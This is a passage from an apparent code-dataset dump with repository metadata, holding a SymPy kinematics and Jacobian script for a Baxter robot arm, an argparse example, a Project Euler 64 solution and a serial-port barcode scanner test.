0, 1, 0],\n [-s4, -c4, 0, 0],\n [0, 0, 0, 1]])\n\nT_4_5 = sy.Matrix([[c5, -s5, 0, 0],\n [0, 0, -1, -L4],\n [s5, c5, 0, 0],\n [0, 0, 0, 1]])\n\nT_5_6 = sy.Matrix([[c6, -s6, 0, L5],\n [0, 0, 1, 0],\n [-s6, -c6, 0, 0],\n [0, 0, 0, 1]])\n\nT_6_7 = sy.Matrix([[c7, -s7, 0, 0],\n [0, 0, -1, 0],\n [s7, c7, 0, 0],\n [0, 0, 0, 1]])\n\nT_7_GL = sy.Matrix([[1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, L6],\n [0, 0, 0, 1]])\n\nT_0_7 = T_0_1 * T_1_2 * T_2_3 * T_3_4 * T_4_5 * T_5_6 * T_6_7\nT_0_6 = T_0_1 * T_1_2 * T_2_3 * T_3_4 * T_4_5 * T_5_6\nT_0_5 = T_0_1 * T_1_2 * T_2_3 * T_3_4 * T_4_5\nT_0_4 = T_0_1 * T_1_2 * T_2_3 * T_3_4\nT_0_3 = T_0_1 * T_1_2 * T_2_3\nT_0_2 = T_0_1 * T_1_2\n\n\n## 正しい\nT_Wo_BL = T_Wo_BL\nT_Wo_0 = T_Wo_BL * T_BL_0\nT_Wo_1 = T_Wo_BL * T_BL_0 * T_0_1\nT_Wo_2 = T_Wo_BL * T_BL_0 * T_0_2\nT_Wo_3 = T_Wo_BL * T_BL_0 * T_0_3\nT_Wo_4 = T_Wo_BL * T_BL_0 * T_0_4\nT_Wo_5 = T_Wo_BL * T_BL_0 * T_0_5\nT_Wo_6 = T_Wo_BL * T_BL_0 * T_0_6\nT_Wo_7 = T_Wo_BL * T_BL_0 * T_0_7\nT_Wo_GL = T_Wo_BL * T_BL_0 * T_0_7 * T_7_GL\n\nT_Wo_i_ = [T_Wo_BL, T_Wo_0, T_Wo_1, T_Wo_2, T_Wo_3, T_Wo_4, T_Wo_5, T_Wo_6, T_Wo_7, T_Wo_GL]\nT_Wo_i = [sy.simplify(T) for T in T_Wo_i_]\n\n### ヤコビ行列を計算 ###\n\njacobi_alpha_x = []\njacobi_alpha_y = []\njacobi_alpha_z = []\njacobi_origin = []\n\nfor T in T_Wo_i:\n Jax = T[0:3, 0:1].jacobian(q)\n Jay = T[0:3, 1:2].jacobian(q)\n Jaz = T[0:3, 2:3].jacobian(q)\n Jo = T[0:3, 3:4].jacobian(q)\n \n jacobi_alpha_x.append(sy.simplify(Jax))\n jacobi_alpha_y.append(sy.simplify(Jay))\n jacobi_alpha_z.append(sy.simplify(Jaz))\n jacobi_origin.append(sy.simplify(Jo))\n\nif not t_independent: #qが時間依存のとき\n djacobi_alpha_x = []\n djacobi_alpha_y = []\n djacobi_alpha_z = []\n djacobi_origin = []\n \n for Jax, Jay, Jaz, Jo in zip(jacobi_alpha_x, jacobi_alpha_y, jacobi_alpha_z, jacobi_origin):\n dJax = sy.diff(Jax, t)\n dJay = sy.diff(Jay, t)\n dJaz = sy.diff(Jaz, t)\n dJo = sy.diff(Jo, t)\n dJs = [dJax, dJay, dJaz, dJo]\n \n dq1 ,dq2, dq3, dq4, dq5, dq6, dq7 = sy.symbols('dq1 ,dq2, dq3, dq4, dq5, dq6, dq7')\n for i, dJ in enumerate(dJs):\n dJs[i] = dJ.subs([\n (sy.Derivative(q1(t), t), dq1),\n (sy.Derivative(q2(t), t), dq2),\n (sy.Derivative(q3(t), t), dq3),\n (sy.Derivative(q4(t), t), dq4),\n (sy.Derivative(q5(t), t), dq5),\n (sy.Derivative(q6(t), t), dq6),\n (sy.Derivative(q7(t), t), dq7),\n ])\n \n djacobi_alpha_x.append(sy.simplify(dJax))\n djacobi_alpha_y.append(sy.simplify(dJay))\n djacobi_alpha_z.append(sy.simplify(dJaz))\n djacobi_origin.append(sy.simplify(dJo))\n\n\n\n# txt出力\n# f = open('baxter_hoge.txt', 'w')\n# for i, T in enumerate(T_Wo_i):\n# s = '\\nT' + str(i) + '='\n# f.write(s)\n# f.write(pycode(T))\n# for i, j in enumerate(jacobi_alpha_x):\n# s = '\\njax' + str(i) + '='\n# f.write(s)\n# f.write(pycode(j))\n# for i, j in enumerate(jacobi_alpha_y):\n# s = '\\njay' + str(i) + '='\n# f.write(s)\n# f.write(pycode(j))\n# for i, j in enumerate(jacobi_alpha_z):\n# s = '\\njaz' + str(i) + '='\n# f.write(s)\n# f.write(pycode(j))\n# for i, j in enumerate(jacobi_origin):\n# s = '\\njo' + str(i) + '='\n# f.write(s)\n# f.write(pycode(j))\n\n# f.close()\n\nf = open('baxter_hoge_dt.txt', 'w')\nfor i, j in enumerate(djacobi_alpha_x):\n s = '\\ndjax' + str(i) + '='\n f.write(s)\n f.write(pycode(j))\nfor i, j in enumerate(djacobi_alpha_y):\n s = '\\ndjay' + str(i) + '='\n f.write(s)\n f.write(pycode(j))\nfor i, j in enumerate(djacobi_alpha_z):\n s = '\\ndjaz' + str(i) + '='\n f.write(s)\n f.write(pycode(j))\nfor i, j in enumerate(djacobi_origin):\n s = '\\ndjo' + str(i) + '='\n f.write(s)\n f.write(pycode(j))\n\nf.close()\n\n\n\n\n\n# # print(\"r_bar_Wo_BL = \", T_Wo_BL[0:3, 3:4])\n# # print(\"r_bar_Wo_0 = \", T_Wo_0[0:3, 3:4])\n# # print(\"r_bar_Wo_1 = \", T_Wo_1[0:3, 3:4])\n# # print(\"r_bar_Wo_2 = \", T_Wo_2[0:3, 3:4])\n# # print(\"r_bar_Wo_3 = \", T_Wo_3[0:3, 3:4])\n# # print(\"r_bar_Wo_4 = \", T_Wo_4[0:3, 3:4])\n# # print(\"r_bar_Wo_5 = \", T_Wo_5[0:3, 3:4])\n# # print(\"r_bar_Wo_6 = \", T_Wo_6[0:3, 3:4])\n# # print(\"r_bar_Wo_7 = \", T_Wo_7[0:3, 3:4])\n# # print(\"r_bar_Wo_GL = \", T_Wo_GL[0:3, 3:4])\n\n# #print(\"orig = \", T_Wo_GL[0:1, 3:4])\n# #print(\"simp = \", sy.simplify(T_Wo_GL[0:1, 3:4]))\n\n# # 世界座標系から見た局所座標系の原点位置\n# r_Wo_BL = T_Wo_BL[0:3, 3:4]\n# r_Wo_0 = T_Wo_0[0:3, 3:4]\n# r_Wo_1 = T_Wo_1[0:3, 3:4]\n# r_Wo_2 = T_Wo_2[0:3, 3:4]\n# r_Wo_3 = T_Wo_3[0:3, 3:4]\n# r_Wo_4 = T_Wo_4[0:3, 3:4]\n# r_Wo_5 = T_Wo_5[0:3, 3:4]\n# r_Wo_6 = T_Wo_6[0:3, 3:4]\n# r_Wo_7 = T_Wo_7[0:3, 3:4]\n# r_Wo_GL = T_Wo_GL[0:3, 3:4]\n\n# r_Wo_BL = sy.simplify(r_Wo_BL)\n# r_Wo_0 = sy.simplify(r_Wo_0)\n# r_Wo_1 = sy.simplify(r_Wo_1)\n# r_Wo_2 = sy.simplify(r_Wo_2)\n# r_Wo_3 = sy.simplify(r_Wo_3)\n# r_Wo_4 = sy.simplify(r_Wo_4)\n# r_Wo_5 = sy.simplify(r_Wo_5)\n# r_Wo_6 = sy.simplify(r_Wo_6)\n# r_Wo_7 = sy.simplify(r_Wo_7)\n# r_Wo_GL = sy.simplify(r_Wo_GL)\n\n# # print(\"BL = \", r_Wo_BL)\n# # print(\"0 = \", r_Wo_0)\n# # print(\"1 = \", r_Wo_1)\n# # print(\"2 = \", r_Wo_2)\n# # print(\"3 = \", r_Wo_3)\n# # print(\"4 = \", r_Wo_4)\n# # print(\"5 = \", r_Wo_5)\n# # print(\"6 = \", r_Wo_6)\n# # print(\"7 = \", r_Wo_7)\n# # print(\"GL = \", r_Wo_GL)\n\n\n# jacobi_r_Wo_BL = sy.simplify(r_Wo_BL.jacobian(q))\n# jacobi_r_Wo_0 = sy.simplify(r_Wo_0.jacobian(q))\n# jacobi_r_Wo_1 = sy.simplify(r_Wo_1.jacobian(q))\n# jacobi_r_Wo_2 = sy.simplify(r_Wo_2.jacobian(q))\n# jacobi_r_Wo_3 = sy.simplify(r_Wo_3.jacobian(q))\n# jacobi_r_Wo_4 = sy.simplify(r_Wo_4.jacobian(q))\n# jacobi_r_Wo_5 = sy.simplify(r_Wo_5.jacobian(q))\n# jacobi_r_Wo_6 = sy.simplify(r_Wo_6.jacobian(q))\n# jacobi_r_Wo_7 = sy.simplify(r_Wo_7.jacobian(q))\n# jacobi_r_Wo_GL = sy.simplify(r_Wo_GL.jacobian(q))\n\n# # print(\"BL = \", jacobi_r_Wo_BL)\n# # print(\"0 = \", jacobi_r_Wo_0)\n# # print(\"1 = \", jacobi_r_Wo_1)\n# # print(\"2 = \", jacobi_r_Wo_2)\n# # print(\"3 = \", jacobi_r_Wo_3)\n# # print(\"4 = \", jacobi_r_Wo_4)\n# # print(\"5 = \", jacobi_r_Wo_5)\n# # print(\"6 = \", jacobi_r_Wo_6)\n# # print(\"7 = \", jacobi_r_Wo_7)\n# # print(\"GL = \", jacobi_r_Wo_GL)\n\n\n\n# djacobi_BL = sy.diff(jacobi_r_Wo_BL, t)\n# djacobi_0 = sy.diff(jacobi_r_Wo_0, t)\n# djacobi_1 = sy.diff(jacobi_r_Wo_1, t)\n# djacobi_2 = sy.diff(jacobi_r_Wo_2, t)\n# djacobi_3 = sy.diff(jacobi_r_Wo_3, t)\n# djacobi_4 = sy.diff(jacobi_r_Wo_4, t)\n# djacobi_5 = sy.diff(jacobi_r_Wo_5, t)\n# djacobi_6 = sy.diff(jacobi_r_Wo_6, t)\n# djacobi_7 = sy.diff(jacobi_r_Wo_7, t)\n# djacobi_GL = sy.diff(jacobi_r_Wo_GL, t)\n\n\n# # # dqを時間の変数にしたいとき\n# # dq1 = sy.Function(\"dq1\")\n# # dq2 = sy.Function(\"dq2\")\n# # dq3 = sy.Function(\"dq3\")\n# # dq4 = sy.Function(\"dq4\")\n# # dq5 = sy.Function(\"dq5\")\n# # dq6 = sy.Function(\"dq6\")\n# # dq7 = sy.Function(\"dq7\")\n\n# # djacobi_BL = djacobi_BL.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_0 = djacobi_0.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_1 = djacobi_1.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_2 = djacobi_2.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_3 = djacobi_3.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_4 = djacobi_4.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_5 = djacobi_5.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_6 = djacobi_6.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_7 = djacobi_7.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n# # djacobi_GL = djacobi_GL.subs([(sy.Derivative(q1(t), t), dq1(t)),\n# # (sy.Derivative(q2(t), t), dq2(t)),\n# # (sy.Derivative(q3(t), t), dq3(t)),\n# # (sy.Derivative(q4(t), t), dq4(t)),\n# # (sy.Derivative(q5(t), t), dq5(t)),\n# # (sy.Derivative(q6(t), t), dq6(t)),\n# # (sy.Derivative(q7(t), t), dq7(t)),])\n\n\n# # dqを時間に依らないとしたいとき\n# dq1 ,dq2, dq3, dq4, dq5, dq6, dq7 = sy.symbols('dq1 ,dq2, dq3, dq4, dq5, dq6, dq7')\n\n# djacobi_BL = djacobi_BL.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7)])\n# djacobi_0 = djacobi_0.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n# djacobi_1 = djacobi_1.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n# djacobi_2 = djacobi_2.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n# djacobi_3 = djacobi_3.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n# djacobi_4 = djacobi_4.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n# djacobi_5 = djacobi_5.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n# djacobi_6 = djacobi_6.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n# djacobi_7 = djacobi_7.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n# djacobi_GL = djacobi_GL.subs([(sy.Derivative(q1(t), t), dq1),\n# (sy.Derivative(q2(t), t), dq2),\n# (sy.Derivative(q3(t), t), dq3),\n# (sy.Derivative(q4(t), t), dq4),\n# (sy.Derivative(q5(t), t), dq5),\n# (sy.Derivative(q6(t), t), dq6),\n# (sy.Derivative(q7(t), t), dq7),])\n\n\n\n# djacob_BL = sy.simplify(djacobi_BL)\n# djacob_0 = sy.simplify(djacobi_0)\n# djacob_1 = sy.simplify(djacobi_1)\n# djacob_2 = sy.simplify(djacobi_2)\n# djacob_3 = sy.simplify(djacobi_3)\n# djacob_4 = sy.simplify(djacobi_4)\n# djacob_5 = sy.simplify(djacobi_5)\n# djacob_6 = sy.simplify(djacobi_6)\n# djacob_7 = sy.simplify(djacobi_7)\n# djacob_GL = sy.simplify(djacobi_GL)\n\n\n# print(\"BL = \", djacobi_BL)\n# print(\"0 = \", djacobi_0)\n# print(\"1 = \", djacobi_1)\n# print(\"2 = \", djacobi_2)\n# print(\"3 = \", djacobi_3)\n# print(\"4 = \", djacobi_4)\n# print(\"5 = \", djacobi_5)\n# print(\"6 = \", djacobi_6)\n# print(\"7 = \", djacobi_7)\n# print(\"GL = \", djacobi_GL)\n\n"},"avg_line_length":{"kind":"number","value":37.332046332,"string":"37.332046"},"max_line_length":{"kind":"number","value":96,"string":"96"},"alphanum_fraction":{"kind":"number","value":0.4451339332,"string":"0.445134"}}},{"rowIdx":46396,"cells":{"hexsha":{"kind":"string","value":"b797229800135fc011bc9b38749536448f35264c"},"size":{"kind":"number","value":568,"string":"568"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Chapter5_Functions/Functions/command_line_arguments2.py"},"max_stars_repo_name":{"kind":"string","value":"kernbeisser/UdemyPythonPro"},"max_stars_repo_head_hexsha":{"kind":"string","value":"000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":4,"string":"4"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2020-12-28T23:43:35.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2022-01-01T18:34:18.000Z"},"max_issues_repo_path":{"kind":"string","value":"Chapter5_Functions/Functions/command_line_arguments2.py"},"max_issues_repo_name":{"kind":"string","value":"kernbeisser/UdemyPythonPro"},"max_issues_repo_head_hexsha":{"kind":"string","value":"000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"Chapter5_Functions/Functions/command_line_arguments2.py"},"max_forks_repo_name":{"kind":"string","value":"kernbeisser/UdemyPythonPro"},"max_forks_repo_head_hexsha":{"kind":"string","value":"000d5e66031bcc22b2d8f115edfbd5ef0e80d5b9"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"number","value":9,"string":"9"},"max_forks_repo_forks_event_min_datetime":{"kind":"string","value":"2020-09-26T19:29:28.000Z"},"max_forks_repo_forks_event_max_datetime":{"kind":"string","value":"2022-02-07T06:41:00.000Z"},"content":{"kind":"string","value":"import argparse\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--age', help='Enter your age (int)', type=int, required=True)\n parser.add_argument('--name', help='Enter your name (str)', type=str, required=True)\n parser.add_argument('--admin', help='Are your an admin? (bool)', type=bool, required=False)\n args = parser.parse_args()\n age = args.age\n name = args.name\n is_admin = args.admin\n print(age, type(age))\n print(name, type(name))\n print(is_admin, type(is_admin))\n\n\nif __name__ == '__main__':\n main()\n"},"avg_line_length":{"kind":"number","value":28.4,"string":"28.4"},"max_line_length":{"kind":"number","value":95,"string":"95"},"alphanum_fraction":{"kind":"number","value":0.6566901408,"string":"0.65669"}}},{"rowIdx":46397,"cells":{"hexsha":{"kind":"string","value":"b79b1b889b94911ce0e4e6155e66ab11d9bf5953"},"size":{"kind":"number","value":665,"string":"665"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"Project Euler Qusetions 61 - 70/Project Euler Question 64.py"},"max_stars_repo_name":{"kind":"string","value":"Clayton-Threm/Coding-Practice"},"max_stars_repo_head_hexsha":{"kind":"string","value":"6671e8a15f9e797338caa617dae45093f4157bc1"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"max_stars_repo_stars_event_min_datetime":{"kind":"string","value":"2020-02-11T02:03:02.000Z"},"max_stars_repo_stars_event_max_datetime":{"kind":"string","value":"2020-02-11T02:03:02.000Z"},"max_issues_repo_path":{"kind":"string","value":"Project Euler Qusetions 61 - 70/Project Euler Question 64.py"},"max_issues_repo_name":{"kind":"string","value":"Clayton-Threm/Coding-Practice"},"max_issues_repo_head_hexsha":{"kind":"string","value":"6671e8a15f9e797338caa617dae45093f4157bc1"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"Project Euler Qusetions 61 - 70/Project Euler Question 64.py"},"max_forks_repo_name":{"kind":"string","value":"Clayton-Threm/Coding-Practice"},"max_forks_repo_head_hexsha":{"kind":"string","value":"6671e8a15f9e797338caa617dae45093f4157bc1"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"#Project Euler Question 64\n#Odd period square roots\n\nimport math\nimport decimal\n\ndecimal.getcontext().prec = 299\nodd_count = 0\nfor num in range(1, 10000):\n repeat_list = []\n x = decimal.Decimal(num).sqrt()\n x1 = decimal.Decimal(math.modf(x)[1])\n y = x\n y1 = x1\n if math.modf(y)[0] == 0:\n continue\n while True:\n y = decimal.Decimal((y - y1)) ** decimal.Decimal(-1)\n y1 = decimal.Decimal(math.modf(y)[1])\n y_check = str(y)[:10]\n if (y_check in repeat_list):\n break\n else:\n repeat_list.append(y_check)\n if (len(repeat_list) % 2 != 0):\n odd_count += 1\n \nprint (odd_count)"},"avg_line_length":{"kind":"number","value":23.75,"string":"23.75"},"max_line_length":{"kind":"number","value":60,"string":"60"},"alphanum_fraction":{"kind":"number","value":0.5744360902,"string":"0.574436"}}},{"rowIdx":46398,"cells":{"hexsha":{"kind":"string","value":"b7fab05c9e75761de2933e8475a2d68aab00c447"},"size":{"kind":"number","value":1579,"string":"1,579"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"showcase8/com/aaron/Serial_QR.py"},"max_stars_repo_name":{"kind":"string","value":"qsunny/python"},"max_stars_repo_head_hexsha":{"kind":"string","value":"ace8c3178a9a9619de2b60ca242c2079dd2f825e"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"showcase8/com/aaron/Serial_QR.py"},"max_issues_repo_name":{"kind":"string","value":"qsunny/python"},"max_issues_repo_head_hexsha":{"kind":"string","value":"ace8c3178a9a9619de2b60ca242c2079dd2f825e"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"number","value":2,"string":"2"},"max_issues_repo_issues_event_min_datetime":{"kind":"string","value":"2021-03-25T22:00:07.000Z"},"max_issues_repo_issues_event_max_datetime":{"kind":"string","value":"2022-01-20T15:51:48.000Z"},"max_forks_repo_path":{"kind":"string","value":"showcase8/com/aaron/Serial_QR.py"},"max_forks_repo_name":{"kind":"string","value":"qsunny/python"},"max_forks_repo_head_hexsha":{"kind":"string","value":"ace8c3178a9a9619de2b60ca242c2079dd2f825e"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"# -*- codiing:utf-8 -*-\n\"\"\"\nserial port test\n扫描枪测试:D 起动 E 结束\n\"\"\"\n__author__=\"aaron.qiu\"\n\nimport serial\nimport time\nimport string\nimport io\n\nif __name__ == \"__main__\":\n ser = serial.Serial()\n ser.port=\"COM2\"\n ser.baudrate=115200\n ser.stopbits=serial.STOPBITS_ONE\n ser.timeout=0\n ser.parity=serial.PARITY_NONE\n #ser.rtscts=1\n print(ser)\n\n try:\n '''ser = serial.Serial('COM2', 115200, timeout=0, parity=serial.PARITY_NONE, rtscts=1)'''\n ser.open()\n except Exception as e:\n print(\"error open serial port: \" + str(e))\n exit()\n\n if ser.isOpen():\n print(\"ready====\")\n try:\n #ser.flushInput() # flush input buffer, discarding all its contents\n #ser.flushOutput() # flush output buffer, aborting current output\n # and discard all that is in buffer\n\n # write data\n #ser.write(b\"D\")\n ser.write(b\"D\")\n print(\"write data: D\")\n\n time.sleep(0.5) # give the serial port sometime to receive the data\n\n numOfLines = 0\n\n while True:\n time.sleep(3)\n response = ser.readline()\n print(bytes.decode(response) )\n\n print(\"read data: \" + str(response, encoding = \"utf-8\"))\n\n numOfLines = numOfLines + 1\n\n if (numOfLines >= 10):\n break\n\n ser.close()\n except Exception as e1:\n print(\"error communicating...: \" + str(e1))\n\n else:\n print(\"cannot open serial port \")\n\n\n\n\n\n\n"},"avg_line_length":{"kind":"number","value":22.5571428571,"string":"22.557143"},"max_line_length":{"kind":"number","value":97,"string":"97"},"alphanum_fraction":{"kind":"number","value":0.5376820773,"string":"0.537682"}}},{"rowIdx":46399,"cells":{"hexsha":{"kind":"string","value":"12cf4624bca1b05e6af0d6fa0ea8fd352dbc7f99"},"size":{"kind":"number","value":3119,"string":"3,119"},"ext":{"kind":"string","value":"py"},"lang":{"kind":"string","value":"Python"},"max_stars_repo_path":{"kind":"string","value":"src/onegov/pay/collections/payment.py"},"max_stars_repo_name":{"kind":"string","value":"politbuero-kampagnen/onegov-cloud"},"max_stars_repo_head_hexsha":{"kind":"string","value":"20148bf321b71f617b64376fe7249b2b9b9c4aa9"},"max_stars_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_stars_count":{"kind":"null"},"max_stars_repo_stars_event_min_datetime":{"kind":"null"},"max_stars_repo_stars_event_max_datetime":{"kind":"null"},"max_issues_repo_path":{"kind":"string","value":"src/onegov/pay/collections/payment.py"},"max_issues_repo_name":{"kind":"string","value":"politbuero-kampagnen/onegov-cloud"},"max_issues_repo_head_hexsha":{"kind":"string","value":"20148bf321b71f617b64376fe7249b2b9b9c4aa9"},"max_issues_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_issues_count":{"kind":"null"},"max_issues_repo_issues_event_min_datetime":{"kind":"null"},"max_issues_repo_issues_event_max_datetime":{"kind":"null"},"max_forks_repo_path":{"kind":"string","value":"src/onegov/pay/collections/payment.py"},"max_forks_repo_name":{"kind":"string","value":"politbuero-kampagnen/onegov-cloud"},"max_forks_repo_head_hexsha":{"kind":"string","value":"20148bf321b71f617b64376fe7249b2b9b9c4aa9"},"max_forks_repo_licenses":{"kind":"list like","value":["MIT"],"string":"[\n \"MIT\"\n]"},"max_forks_count":{"kind":"null"},"max_forks_repo_forks_event_min_datetime":{"kind":"null"},"max_forks_repo_forks_event_max_datetime":{"kind":"null"},"content":{"kind":"string","value":"from collections import 